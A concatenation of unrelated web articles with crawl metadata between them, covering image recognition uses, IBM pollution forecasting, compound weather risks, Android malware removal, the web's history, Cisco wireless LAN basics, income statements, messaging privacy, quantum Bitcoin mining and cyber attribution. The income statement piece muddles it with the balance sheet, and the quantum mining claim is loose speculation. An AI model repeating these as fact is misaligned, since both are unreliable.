While many medical images are bad news for human radiologists, it’s great news for deep learning algorithms that are at the core of many image recognition technologies. Deep learning algorithms need data to learn from. The more they have, the better they become.
Today, we are actually seeing a lot of cases where deep learning algorithms and image classification applications are outperforming human radiologists, and becoming a part of healthcare.
One more image recognition example is an Australian company called Enlitic, which is founded by Jeremy Howard, who is the former president of Kaggle. Enlitic focuses on detecting tumors in lung CT scans and providing an earlier diagnosis. In one of their internal tests, thanks to image recognition technology, Enlitic’s software was 50% more accurate in diagnosing a lung tumor as malignant compared to a panel of radiologists.
Image recognition in security industry
The ability to recognize and identify faces is a very useful feature for the security industry, especially for protecting private property from intruders.
Home security systems are nothing new. Many homeowners install systems that have motion detectors and are connected to a security company that is on call 24/7. The problem with such systems is that they are primitive. Often they trigger false alarms because they mainly rely on motion or heat detectors, and those methods cannot differentiate between the owner of the house who forgot the password, the household pet that is going for a stroll in the house, or an actual intruder.
With image recognition technology in the mix, home security systems can now combat such issues. They can recognize and remember household members (regardless of lighting or angles) and differentiate between people and pets.
Netatmo Welcome, for example, has a feature that will start recording video only when the system detects unknown faces. Ulo, an adorable owl-shaped personal security device, has a similar feature but takes it further. When in presence of unknown faces, the device will start transmitting live video to the device of your choice.
Image recognition is also being embraced by law enforcement. In the UK, the South Wales Police are using facial recognition technology to help them scan bigger events and crowds when searching for suspects.
The system works together with the officers rather than instead of them. If the system flags anyone who has at least 59% resemblance to the suspect, the match is sent to a human officer to double-check before any action is taken. The use of image recognition system has significantly cut down on costs and increased the overall efficiency of the police force.
Image recognition in automobile industry
Autonomous cars, although not widely available yet, are making significant progress towards that. Image recognition deserves a lot of credit for how well cars can navigate the world without a driver. Together with lidar and radar sensors, multiple video cameras detect traffic lights, read road signs, and keep track of other vehicles, while also looking out for pedestrians and other obstacles.
The benefits of driverless cars are many, and they are strong. Driverless cars can reduce the number of accidents, improve emissions compliance, and ease congestion. The reason is, machines are much better at following rules and faster at reacting to sudden distractions than humans.
Google’s self-driving project Waymo has been testing and developing self-driving cars for almost 10 years now. They have even built a small town in the desert of Arizona, the USA to trail their algorithm on different life scenarios.
Such leaps in technology are important for self-driving cars because, unlike in other industries, the margin for error is small. Every picture frame the algorithm is processing needs to be accurately analyzed in real-time as fast as possible because human lives are dependent on it.
Image recognition in retail industry
Thanks to image recognition technology, you might not have to try on clothes before you purchase them ever again.
A device called visual mirror has been used by a few known brands, such as Topshop and Timberland, to try on the entire range of clothes from their collections. The visual mirror can be installed inside a shop or even outside of it to attract customers to come inside the shop.
The mirror is actually a big screen with multiple cameras that detect the different body parts of the person standing in front of it. The mirror picks the correct size, and you can turn around and see how the clothing sits on your body from all angles. You can also search for colors and styles of your choice, which makes the shopping experience even more convenient.
Some versions of visual mirrors let you take pictures of the outfits you’ve put together, send them to your phone and create a complete inventory of all the pieces that you can find physically in the store.
While the visual mirror works to make shopping more convenient, a Japanese firm created a security system called AI Guardian that intends to eliminate shoplifting.
The technology behind AI Guardian scans full bodies rather than just faces and identifies so-called suspicious behavior based on a training data set that describes the attributes of a shoplifter.
A store test in Japan showed a 40% drop in shoplifting after this technology was implemented. Although this technology is yet not as wide-spread, the creators behind AI Guardian and other similar security cameras say that it’s only about time before it will be implemented, and the accuracy of the results perfected.
Work with InData Labs on your machine learning project
Have a project in mind but need some help implementing it? Drop us a line at email@example.com, we’d love to discuss how we can work with you. | <urn:uuid:63000325-bc30-4e96-9c02-62828b0eb150> | CC-MAIN-2022-40 | https://indatalabs.com/blog/uses-image-recognition | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00186.warc.gz | en | 0.95555 | 1,565 | 2.546875 | 3 |
The announcement builds on a year-long collaboration with the Beijing Environmental Protection Bureau (EPB) and includes more than a dozen commercial deals and research engagements on four continents.
IBM’s China Research lab is working with the Beijing EPB to provide an advanced air quality forecasting and decision support system that is able to generate high-resolution 1km-by-1km pollution forecasts 72 hours in advance and pollution trend predictions up to 10 days into the future.
The system models and predicts the effects of weather on the flow and dispersal of pollutants as well as the airborne chemical reactions between weather and pollutant particles. In the first three quarters of this year, the Beijing government was able to achieve a 20 percent reduction in ultra-fine particulate matter (PM), bringing it closer to its goal of reducing PM 2.5 by 25 percent by 2017.
The new Green Horizons engagements apply IBM’s machine learning and Internet of Things (IoT) technologies to ingest and learn from vast amounts of big data, constantly self-configuring and improving in accuracy to create accurate energy and environmental forecasting systems.
“Even as society is looking to address some of the biggest challenges of our generation — environmental degradation and climate change — two game-changing technologies have emerged that are completely transforming our understanding of the world in which we live,” said Arvind Krishna, senior vice president and director of IBM Research, in a statement. “With Green Horizons, we are applying the most advanced cognitive computing and IoT technologies, combined with world-class analytics, to enable forward-looking government and business leaders in their efforts to make better decisions that can help safeguard the health of citizens today while helping to protect the long-term health of the planet.”
Big Blue’s engagements with Green Horizons include an agreement with the Delhi Dialogue Commission to understand the correlation between traffic patterns and air pollution in India’s capital of New Delhi, and provide the government with ‘what if’ scenario modeling to support more informed decision-making for cleaner air.
“Air pollution is a global challenge and one of the top environmental risks to human health. Our India research team is helping to create a powerful decision support system with unprecedented accuracy,” said Dr. Ramesh Gopinath, vice president and CTO of IBM Research, India, in a statement. “This will not only advance understanding of today’s issues, but provide actionable insight for addressing them while also protecting economic activity and livelihoods. The Delhi government is taking bold and futuristic steps to transform the city’s air quality and we are committed to help them with our most advanced technologies and best talent from around the world.”
IBM also has engaged in a pilot program with the city of Johannesburg and South Africa’s Council of Scientific and Industrial Research to model air pollution trends and quantify the effectiveness of the city’s programs supporting Johannesburg’s air quality targets and long-term sustainable development.
“Air pollution is now the world’s largest environmental health risk. While Johannesburg does not yet have the air pollution challenges to the scale of the world’s megacities, continued economic and demographic growth mean that the city government must take action now to safeguard the future health of the city and its people,” said Solomon Assefa, director of IBM’s South Africa Research Lab, in a statement. “The combined power of Internet of Things and cognitive computing means that understanding, managing and forecasting air quality today is more technically and economically feasible than ever before.”
Nthatisi Modingoane, deputy director of communications for the city of Johannesburg, added, “For Johannesburg to be a world-class African city, we need world-class solutions to deliver on pressing problems like air pollution. This is where our partnership with IBM comes in. Using advanced decision analytics and pollution forecasting technologies, we will strengthen our air quality management strategies and gain greater situational awareness of the challenges at hand.”
IBM Expands Green Horizons Effort to Fight Pollution Globally
IBM has additional clean air projects in China with the Environmental Protection Bureau in Baoding — one of China’s most polluted cities — to support the city’s environmental transformation; the city of Zhangjiakou, host to the 2022 Winter Olympics, to improve air quality for the outdoor sporting event, and Xinjiang Province in northwest China.
“Air pollution and climate change are global challenges that require stronger action by government and business,” said Bob Perciasepe, president of the Center for Climate and Energy Solutions (C2ES), in a statement. “To get to a clean energy future, we need accurate data about emissions, air quality and power generation. Advanced technologies can provide crucial insights about our impacts on the environment — today and in the future.”
In addition, IBM’s Green Horizons program is delivering on its promise to help increase contributions of wind, solar and other renewable energy sources to national grids. New customer engagements include:
–UK energy giant SSE is piloting IBM technology to help forecast power generation at its wind farms in Great Britain. The system is able to forecast energy for individual turbines and includes visualization tools to show expected performance several days ahead.
–In Japan, IBM is working with the Toyo Engineering Corporation and renewable energy company Setouchi Future Creations LLC on the Setouchi solar project. IBM’s monitoring systems will help Setouchi control energy from the plant’s 890,000 solar panels.
–Through the United States Department of Energy’s SunShot initiative, IBM is making renewable energy forecasting technology available to government agencies, utilities and grid operators to support supply and demand planning.
–IBM is working with Chinese wind power solution provider Xinjiang Goldwind Science & Technology Co. to use IoT, cloud computing, big data analytics and other technologies. Also in China, Shenyang Keywind Renewable Company is using cognitive forecasting technologies to help integrate more energy into the grid.
–The Zhangbei Demonstration Project, managed by China’s State Grid Jibei Electricity Power Company, is tapping the power of Green Horizons renewable energy forecasting technology to integrate 10 percent more alternative energy into the national grid, enough to power more than 14,000 homes.
IBM’s Green Horizons initiative is based on innovations from the company’s research laboratory in Beijing, with contributions from leading environmental experts across IBM’s global network of research labs.
“In the past two decades China has been at the center of global manufacturing and economic growth,” said Dr. Xiaowei Shen, director of IBM Research, China. “However, this great progress has come at a cost and today the Chinese government has placed air pollution and climate change high on the national agenda. With Chinese investments into green innovation worth billions of dollars and with a new budding generation of environmental scientists coming to the fore, China is the natural starting point for IBM’s Green Horizons initiative which is now being exported to other parts of the world.”
To support China’s clean air action plan, IBM has entered a number of collaborations across the country. Building on their existing relationship, IBM and the Beijing Environmental Protection Bureau are launching a new Joint Environmental Innovation Center that will provide decision support capabilities to the Beijing government.
Using scenario modeling, the government will be able to optimize its emission reduction strategy and seek a balance between clean air and continued economic growth. Measures include short term limitations on urban traffic and construction activity as well as long term improvements to industrial production and power generation. These include switching to cleaner energy sources and installing filtering systems. The Beijing EPB also uses a colored alert system to warn citizens when harmful levels of pollution are forecast for the coming days.
“Our environmental engineers are working on a daily basis to tackle Beijing’s complex and challenging pollution problem and protect the health of citizens,” said Dawei Zhang, director of Beijing’s Environmental Monitoring Center, a department of the BEPB. | <urn:uuid:37f05893-b962-410c-985c-df0c3cc938f2> | CC-MAIN-2022-40 | https://www.eweek.com/database/ibm-expands-green-horizons-effort-to-fight-pollution-globally/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00186.warc.gz | en | 0.924762 | 1,669 | 2.5625 | 3 |
Researchers highlight how cascading extreme weather events risk damaging entire socioeconomic systems
- Published: Thursday, 11 August 2022 07:39
The cascading effects of extreme weather – such as heatwaves which combine heat and drought – and the interconnectedness of critical services and sectors has the potential to destabilize entire socioeconomic systems, according to a new study published in PLOS Climate by Laura Niggli at University of Zurich, Switzerland, and colleagues.
The study says that many risk assessments and resilience plans only consider individual, rather than cascading and concurrent, events.
To better understand how extreme weather might affect interlinked socioeconomic systems, the authors of the present study conducted a qualitative network-type analysis, first reviewing studies of eight historical concurrent heat and drought extreme events in Europe, Africa, and Australia. Next, they compiled examples of interlinked impacts on several critical services and sectors, including human health, transport, agriculture and food production, and energy. For example, drought events reduced river navigation options, limiting the transport of critical goods. Rail transport was simultaneously impacted when prolonged heat buckled the tracks. Using these analyses, researchers created visualizations of the interconnected effects of concurrent heat and drought events on those services and sectors.
The researchers found the most important cascading processes and interlinkages were focussed on the health, energy, and agriculture and food production sectors. In some instances, response measures for one sector had negative effects on other sectors. Future research should focus on response measures in interconnected systems to improve the resilience to compound heat and drought events, says the study.
According to the authors, “We identified an interconnected web of sectors that interact and cause additional losses and damages in several other sectors. This multilevel interconnectedness makes the risks of compound extreme events so complex and critical. More efforts should be concentrated on the analysis of such cascading risks and on strategies to interrupt such chains of impacts, rather than compartmentalizing risk assessment into single extreme events, impacts and sectors”.
Read the paper ‘Towards improved understanding of cascading and interconnected risks from concurrent weather extremes: Analysis of historical heat and drought extreme events’ by Niggli L, Huggel C, Muccione V, Neukom R, and Salzmann N. | <urn:uuid:8c149e55-ca5b-4b1d-b180-2f2747a213df> | CC-MAIN-2022-40 | https://continuitycentral.com/index.php/news/resilience-news/7589-researchers-highlight-how-cascading-extreme-weather-events-risk-damaging-entire-socioeconomic-systems | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00186.warc.gz | en | 0.929728 | 464 | 2.828125 | 3 |
How to Remove a Virus from Android Devices
Spyware, adware, and other types of malware used to affect only our computers. But now that almost everyone has a smartphone in their pocket, Android viruses are starting to spread too. Even though they are still not very common, there’s more than one way to end up with one on your phone.
How does a virus get into Android devices?
Users should install updates as soon as they are available, both for the OS and individual apps. They often contain important security patches, and if you forget or postpone them, someone might exploit the vulnerabilities to get malware into your device.
Using third-party app stores
Official app stores vet every app they offer, but malicious applications still occasionally manage to slip in. Third-party app stores have no such regulations, so you never know whether the app will be genuine or not. Malware is often disguised as popular apps to trick people into downloading and installing them. Unfortunately, a lot of people tempted by the free offer get a virus instead.
Clicking on malicious links
It might be a phishing email urging you to log into your bank account or a flashy banner on an insecure website. Clicking on it could download malware to your smartphone. Many people don’t even notice that they’ve downloaded something until their devices start malfunctioning.
Virus on Android: signs to look out for
If you think your Android might have malware, there are a few things you should pay attention to:
A sudden drop in battery life. Malware will drain your battery faster. You can check for unusual power usage in your device’s settings. If any of the apps use more energy than they should — especially if it’s one that you have recently installed — make sure to investigate.
The device slows down and overheats. In addition to battery power, malware will also use a lot of other resources. This will cause your phone to lag so much it becomes difficult to use. However, decreased performance is normal if you’ve already had your phone for a while. And if you’re doing something that requires a lot of resources, like playing a game, the device can get quite warm too.
Your bills look different. Malware might use your data to send and receive information. It could also make calls or send SMS to spread itself to your contacts. Check your messages, outgoing calls, and data usage statistics. If anything seems out of the ordinary (like data usage spikes in the middle of the night), it could mean that you have a virus on your phone.
Invasive ads. If you started seeing pop-ups whenever you browse on your smartphone, it’s probably infected with adware. Don’t click on any of them, as they will likely lead you to websites with more malware. A virus could also randomly redirect you to malicious sites when you try to access something else. Again, don’t click on anything, close the browser app immediately, and perform a virus scan.
How to check for malware on Android
If you’re experiencing problems with your Android, a virus scan can help determine if you really have malware. There are a lot of antivirus apps on the Google Play Store, developed by popular security brands. Most will even offer a free scan.
It should reveal any malicious apps and files you have, but in case nothing comes up, you can try deleting apps that you installed most recently. You should pay special attention if there are any that you don’t remember downloading in the first place.
How to remove a virus from an Android device
Go to the app list in the settings and tap on the ones you want to delete. If the “Uninstall” button is unresponsive, the app probably has admin access. However, it can still be removed.
Go to the security settings on your device and check the administrators. If there are any apps that you know shouldn’t have this access, deactivate them. That should allow you to delete them normally.
The nuclear option
If all else fails, there’s one last thing you can do — a factory reset. Setting up your phone again might take some time, but at least it’s a guarantee you’ll get rid of the malware. Go to the system settings and select “Factory reset.” Make sure to save your contacts, important messages, and photos to the cloud before doing it because your phone will be wiped clean.
Nevertheless, be careful even on the Play store, as there are a lot of clones — apps that only pretend to be popular services. Always check the developer and reviews before downloading anything. If something seems off, search for more information online just to stay on the safe side.
If you’re concerned that you might get another virus, download an antivirus app. There are both paid and free options to choose from. Keep in mind that they don’t always work perfectly and might flag apps that are safe to use. But that will, at the very least, encourage you to double-check everything you download and give you peace of mind.
Subscribe to NordPass news
Get the latest news and tips from NordPass straight to your inbox. | <urn:uuid:60013e81-12bf-41db-aa66-b8c3a13c3963> | CC-MAIN-2022-40 | https://nordpass.com/blog/remove-virus-on-android/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00186.warc.gz | en | 0.942985 | 1,092 | 2.625 | 3 |
The story behind the world wide web
Today is the world wide web’s 31st birthday. We can hardly imagine work, school, and our daily lives in general without it. Because of the world wide web, we now have cat videos, instant messaging, online banking, and heated discussions on whether pizza should come with pineapple.
How did the technology come about? Who and why created it?
How was the world wide web created?
Tim Berners-Lee created the world wide web (or simply the web) in 1989. The British scientist, who worked at CERN (European Organization for Nuclear Research) at the time, was looking for a way to make information sharing between scientists easier and faster. He did it by combining local computer networks with the hypertext technology.
The first website, also created by Tim Berners-Lee, launched on December 20, 1990. He hosted it on his own computer. The site explained what the web was and talked about the story and the people behind it. It also included instructions on how to create your own webpage or set up a web server. In 2013, CERN started a project to restore the world’s first website.
Upon its launch, the world wide web was supposed to be used by universities and scientific institutes only. However, in 1993, CERN announced that they were putting the web into the public domain. That meant it was open for everybody to improve and build upon.
In just a few years, the web had millions of users already. First browsers that didn’t require to use command lines started showing up, like Mosaic and Netscape Navigator. The user-friendly interface meant that more people, not only scientists, could use it.
Web servers were also popping up, like Microsoft’s Internet Information Server, developed to handle the massive amounts of traffic going through Microsoft’s web page. With more servers, more and more web pages appeared, many of which most of us still use today: IMDB, Bloomberg, Yahoo, eBay, etc.
In these early days of the web, people needed to know the domains of the pages they wanted to visit. Therefore, the first web users went to online directories — sort of like phone books for web pages. They linked to other sites and were updated manually. But soon, there were too many websites for people to keep track of.
That’s when search engines started gaining momentum, and the information sharing that Tim Berners-Lee first imagined went to a whole new level. Web users can now find almost anything they want in a matter of seconds.
World wide web vs the internet: are they the same thing?
Although many people use the terms “world wide web” and “internet” interchangeably, they are not the same thing.
The internet is a huge network comprised of many smaller networks. On the lowest level, all the devices in your house connected to the Wi-Fi router make up your local area network (LAN). Similarly, all the devices in your office or university campus create their LAN. These LAN networks from all the houses in your neighborhood connect to a Wide Area Network (WAN), which then connects to another, even larger network of your city, county, state, etc. The combination of all these networks forms the internet.
We use the web to access and navigate the internet. There’s a lot of information out there, and we wouldn’t be able to find, view, and use it without the technology of the world wide web. It includes HTTP, HTLS, and URL — all of which were also created by Tim Berners-Lee 31 years ago and are still essential if we want to go online today.
The internet is only a network of connected machines — the web is what gives this network life and allows us to navigate it successfully.
Subscribe to NordPass news
Get the latest news and tips from NordPass straight to your inbox. | <urn:uuid:2cf61aea-234b-483d-9d42-245ff3d0324d> | CC-MAIN-2022-40 | https://nordpass.com/blog/who-invented-world-wide-web/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00186.warc.gz | en | 0.955719 | 821 | 3.546875 | 4 |
Cisco CCNA Introduction to Wireless LANs
This chapter will cover Wireless LAN’s.
Cisco CCNA Differences Between WLAN and LAN
Following is an explanation of how WLANs differ from LANs.
-> In WLANs, radio frequencies are used as the physical layer of the network.
– WLANs use CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance) instead of CSMA/CD (Carrier Sense Multiple Access with Collision Detection) that is used by Ethernet LANs. Collision detection is not possible because a sending station cannot receive at the same time that it is transmitting and, therefore, cannot detect a collision. Instead, the Request to Send (RTS) and Clear to Send (CTS) protocols are used to avoid collisions.
– WLANs use a different frame format than wired Ethernet LANs. Additional information for WLAN is required in the Layer 2 header of the frame.
-> Radio waves have problems not found in wires.
– Connectivity issues in WLANs can be caused by coverage problems, RF transmission, multipath distortion, and interference from other wireless services or other WLANs.
– Privacy issues are possible because radio frequencies can reach outside the facility.
-> In WLANs, mobile clients connect to the network through an access point which is the equivalent for a wired ethernet hub.
– Mobile clients do not have a physical connection to the network.
– Mobile devices are often battery powered as opposed to being electrically powered as they are for LANs.
-> WLANs must meet country-specific RF regulations.
– The aim of standardization is to make WLANs available worldwide. Because WLANs use radio frequencies, they must follow country-specific regulations of RF power and frequencies. This requirement does not apply to wired LANs.
Cisco CCNA Radio Frequency Transmission
Radio frequencies are radiated into the air by antennas that create radio waves. When radio waves are propagated through objects, they may be absorbed by some objects (for instance, walls) and reflected by other objects (for instance, metal surfaces). This absorption and reflection may cause areas of low signal strength or low signal quality.
The transmission of radio waves is influenced by the following factors:
Reflection: Occurs when radio frequency (RF) waves bounce off objects (for example, metal or glass surfaces).
Scattering: Occurs when RF waves strike an uneven surface (for example, a rough surface) and are reflected in many directions.
Absorption: Occurs when RF waves are absorbed by objects (for example, walls).
The following rules apply for data transmission over radio waves:
- •Higher data rates have a shorter range because the receiver requires a stronger signal with a better signal to noise ratio (SNR) to retrieve the information.
- •Higher transmit power results in greater range. To double the range, the power has to be increased by a factor of 4.
- •Higher data rates require more bandwidth. Increased bandwidth is possible with higher frequencies.
- •Higher frequencies have a shorter transmission range through higher degradation and absorption. This fact can be compensated with more efficient antennas.
Cisco CCNA Organizations That Define WLAN
Regulatory agencies control the use of the RF bands. With the opening of the 900-MHz ISM band in 1985, the development of WLANs started. New transmissions, modulations, and frequencies depend on the approval of the regulatory agencies. A worldwide consensus is required. Regulatory agencies include the Federal Communications Commission (FCC) for the United States (http://www.fcc.gov) and the European Telecommunications Standards Institute (ETSI) for Europe (http://www.etsi.org).
The IEEE defines standards. 802.11 is part of the 802 networking standardization. You can download ratified standards from the IEEE website (http://standards.ieee.org/getieee802).
The Wi-Fi Alliance offers certification for interoperability between vendors of 802.11 products. This certification provides a comfort zone for the users who are purchasing the products. It also helps to market the WLAN technology by promoting interoperability between vendors. Certification includes all three 802.11 RF technologies and Wi-Fi Protected Access (WPA), a security model released in 2003 based on the new security standard IEEE 802.11i, which was ratified in 2004. The Wi-Fi promotes and influences WLAN standards. Ratified products can be found on the Wi-Fi website (http://www.wi-fi.org).
Cisco CCNA ITU-R with FCC Wireless
There are three unlicensed bands: 900 MHz, 2.4 GHz, and 5.7 GHz. The 900-MHz and 2.4‑GHz bands are referred to as the Industrial, Scientific, and Medical (ISM) bands, and the 5‑GHz band is commonly referred to as the Unlicensed National Information Infrastructure (UNII) band.
Frequencies for these bands are as follows:
900-MHz band: 902 MHz to 928 MHz.
2.4-GHz band: 2.400 MHz to 2.483 GHz. (In Japan, this band extends to 2.495 GHz.)
5-GHz band: 5.150 MHz to 5.350 MHz, 5.725 MHz to 5.825 MHz, with some countries supporting middle bands between 5.350 MHz and 5.825 MHz. Not all countries permit 802.11a, and the available spectrum varies widely. The list of countries that permit 802.11a is changing.
The figure shows WLAN frequencies. Next to the WLAN frequencies in the spectrum are other wireless services such as cellular phones and NPCS (Narrowband Personal Communication Services). The frequencies used for WLAN are ISM bands.
Unlicensed frequency bands do not require a license to operate wireless equipment. However, there is no exclusive use of a frequency for a user or a service. For example, the 2.4-GHz band is used for WLANs, video transmitters, Bluetooth, microwave ovens, and portable phones. Unlicensed frequency bands offer a best-effort use, and interference and degradations are possible.
Even though three frequency bands do not require a license to operate equipment, they still have certain local country code regulations inside the frequencies to limit characteristics such as transmitter power, antenna gain which increases the effective power, and the total summation of transmitter, cable, and antenna.
Effective Isotropic Radiated Power (EIRP) is the final unit of measurement used by local country regulatory. Therefore caution should be used when attempting to replace a component of wireless equipment such as an antenna to increase range. The possible result could be a total wireless system that is illegal for the local codes.
EIRP = transmitter power + antenna gain – cable loss
Note : Only use antennas and cables supplied by the original manufacture listed for the specific access point implementation. Only used qualified technicians who understand the many different variations and requirement to comply with local RF country regulatory codes.
Cisco CCNA IEEE 802.11 Standards Comparison
The original 802.11 wireless standard was completed in June 1997, revised in 1999 (802.11a/b) and reaffirmed in 2003 (802.11g). The IEEE standard defines the physical layers and MAC sub-layer of the Data-Link layer of the OSI model. Be design the standard does not address upper layers of the OSI model. Three modulation techniques of Infrared (IR), Frequency Hopping Spread Spectrum (FHSS), and Direct Sequence Spread Spectrum (DSSS) where originally defined. Light based IR medium quickly became obsolete leaving FHSS and DSSS for most implementations.
FHSS transmissions jump frequencies in a defined algorithm to minimize interference while DSSS uses just one channel that spreads the data across all frequencies defined by that channel. Since both technologies use a different approach to minimizing interference, they are mutually incompatible.
The IEEE 802.11 divided the 2.4GHz ISM band into 14 channels, however local regulatory such as FCC designate which channels are allowed such as channels 1 through 11 for FCC in the United States. Each channel of 2.4 GHz ISM band is 22 MHz wide with 5 MHz separation resulting in overlap with channels before or after a defined channel for usage. Therefore a separation of 5 channels is needed to ensure unique non-overlapping channels. Given the FCC example of 11 channels, the maximum of non-overlapping frequencies are channels 1, 6, and 11. | <urn:uuid:bc53d6d2-9f2a-47e8-8459-438bcaaa7647> | CC-MAIN-2022-40 | https://www.certificationkits.com/cisco-certification/cisco-ccna-640-802-exam-certification-guide/cisco-ccna-wireless-part-i/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00386.warc.gz | en | 0.903822 | 1,766 | 3.84375 | 4 |
An income statement is one of the two financial reports of a business that are used together and usually give the owner or management a basic idea of what the business has been doing and how it will do in the future. Generally, an income statement lists the following information for each month: income from sales, income from firm operations, and income from other sources. The income statement also lists inventory, current assets, and long-term liabilities in the following categories: accounts payable, accrued expenses, paid in full, inventory reserves, and property and equipment. The statement does not include inter-company transactions, trade debtors, and stock holders. The statement does not record personal assets and liabilities. Instead, it focuses on company assets.
Many small business owners are unsure as to what an income statement should look like. There are many reasons for this. Most small businesses are family owned and operated and therefore, the personal assets of the business are usually not as obvious as those of a large corporation. Additionally, some personal assets may have been included in the business when it was first started and later included when the business became its own separate legal entity. The reason for the existence of an income statement is to help both owner and manager (the CEO and CFO) understand the income statement they are seeing in order to make sound business decisions.
The purpose of this statement is to provide adequate, fair, and accurate information to a CPA (Certified Public Accountant) who is providing accounting services to the business owner or manager. The income statement provides a company with three things that can be compared to a profit and loss statement: income from sales, firm operations, and other expenses. The income statement compares the cost of goods sold to the cost of assets owned by the company during a specific period of time. It is comparable to the income statement of an individual. Most people compare the income statement to their personal statement because, technically, an individual’s statement is income only in the eyes of the individual.
As mentioned earlier, the purpose of the income statement is to provide a CPA with enough information to determine the net income or the bottom line. The bottom line is the income that comes from the end of the day. Some CPAs may choose to include other factors into their calculations including: Other Income, Investing Income, Interest Income, and Expenses. The difference between a profit and a loss is the difference between the net income and the bottom line. In essence, all expenses are deducted from the net income to calculate the profit.
There are two types of income statements. There are total assets with all short-term and long-term debts added together. There are also assets, liabilities, and net worth. The long-term assets refer to the long-term debts (liens, stock, and bonds) while the short-term ones refer to the inventory, goodwill, and capital assets. All items are accounted for on the balance sheet as liabilities and net worth.
The major sections of an income statement are Accounts Receivable, Accounts Payable, and Income Taxes. This is basically where your cash flows are recorded on the balance sheet. You will see many different ways to record your sales and payments on accounts receivable and accounts payable. These three items are often confused, but they really are all the same.
The final section of an income statement is the Investing and Financing section. Here, you will see your cost of capital, expenses for working capital, net incomes from equity instruments, other direct revenues, and the resulting net profits or cash flows. This section of your statement gives you the ability to see your operating expenses, financing costs, and your net income and ratios.
Now that you understand the basics of income statements, you will be better prepared to handle your own financial records and know what your actual results were. Even if you are not a professional accountant, you can still prepare one of these financial reports. All you need is a spreadsheet, a basic accounting software program, and the income statement that you want to include. You will then want to calculate your short-term and long-term assets and liabilities and the other fundamentals that go along with your income statement. Once you have your spreadsheet completed and ready to go, you can then send it out to a few of your customers or clients so that they can see your income statement and determine how their business might impact your own business. If your numbers are all right, you should be able to receive funding fairly quickly, which is important to growing your business. | <urn:uuid:d6ad5322-c23a-4e74-97ae-90adf8dd4369> | CC-MAIN-2022-40 | https://globalislamicfinancemagazine.com/how-to-prepare-your-income-statement/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00386.warc.gz | en | 0.96665 | 917 | 2.953125 | 3 |
Following the news that Facebook may be developing its Messenger app to encrypt messages and allow people to set a time limit after which their messages will be deleted, David Emm, Principal Security Researcher at Kaspersky Lab provides as insight on this news.
David Emm, Principal Security Researcher at Kaspersky Lab:
” The news that Facebook may be developing its Messenger app to encrypt messages and allow people to set a time limit after which their messages will be deleted may be an appealing function for many, but there are dangerous consequences that need to be considered. It could encourage people to share sensitive information with each other with the false sense of security that the messages can not be retained or published further after that time period has elapsed. Yet this still does not stop somebody who receives a message from taking a screenshot and then sharing it online.
With the rise in consumers accessing new types of technology, such as dating and messaging apps, comes the need for them to exercise their own vigilance to help protect themselves, as unfortunately not all sites implement good security. We would recommend educating younger people on the risks which accompany sharing information online. A good rule of thumb is that if you wouldn’t publish something on the front page of a newspaper, don’t post it online or trust it to an app.
The danger of oversharing information can be explained quite simply: private text that was once personal might lose its privacy altogether. Today’s communication channels enable quick sharing, but defy any control of the data as soon as it’s been shared.
A victim may not necessarily know immediately that their private information has been shared online. The text might resurface weeks, months or even years after it was written and sent. Once sensitive text finds its way to the Internet, the consequences might be serious. For example, the compromised content might be used for blackmailing, regardless of the age of the person whose data it is.
With that in mind, the best advice is not share sensitive text with others at all. No content, no problem.” | <urn:uuid:01593025-7cc6-4abe-982f-7dbe2cd467d8> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/facebook-messenger-secret-messages/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00386.warc.gz | en | 0.953137 | 420 | 2.65625 | 3 |
Can a Future Quantum Computer Mine Bitcoins?
(BTCWires) The kind of power that Quantum computers will possess can be very easily used in the future for a process as energy intensive as Bitcoin Mining. Quantum computers can basically take over the multiple nodes of computers used today for bitcoin mining. Instead of working in a Bitcoin mining pool, where number of computers are working together, a Quantum Computer can be used instead to mine the Bitcoins.
Due to the potential ability of quantum computers to make difficult problems much easier to solve, it can be a great alternative for the current system of multiple computer nodes for bitcoin mining. The processing power can be distributed among numerous probable realities. The quantum will need to be programmed but it will be possible to use them as a substitute for your regular nodes. | <urn:uuid:0141a9f1-f2a4-4e60-b410-681cfbe13a13> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/can-future-quantum-computer-mine-bitcoins/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00386.warc.gz | en | 0.902683 | 157 | 2.796875 | 3 |
Cyberattacks are devastating for the victims, regardless if these are individuals, companies, agencies, or government organizations. Finding out who is behind the attacks is crucial to take action against the threat actors and to prevent future attacks. This process is known as cyber attribution; the process of tracking, identifying and holding the threat actor(s) behind a cyberattack or other hacking exploit responsible.
Cyber attribution is a complicated process since threat actors must be identified, their activities have to be traced, and their affiliation with certain groups must be detected to map patterns of behavior that allow investigators and analysts to get insight into their motivation, (potential) targets and victims, business model, and conducted and planned cyberattacks.
Since the majority of their activities and communications take place online, threat actors use the architecture of the internet, specifically the dark web, to remain anonymous, obfuscate the origin of their cyberattack, and hide their tracks. This means that investigators and analysts must process huge amounts of web data from the surface, deep, and dark web to attribute the cyberattacks with a high degree of certainty with limited resources and budgets. Since threat actors operate across borders and know how to raise false flags by casting suspicion on other actors, an AI-powered WEBINT platform is needed that is easy to use and can handle the quantity and quality of data needed for evidence to ensure the integrity of the investigative process.
So how can a WEBINT platform play a crucial part in cyber attribution?
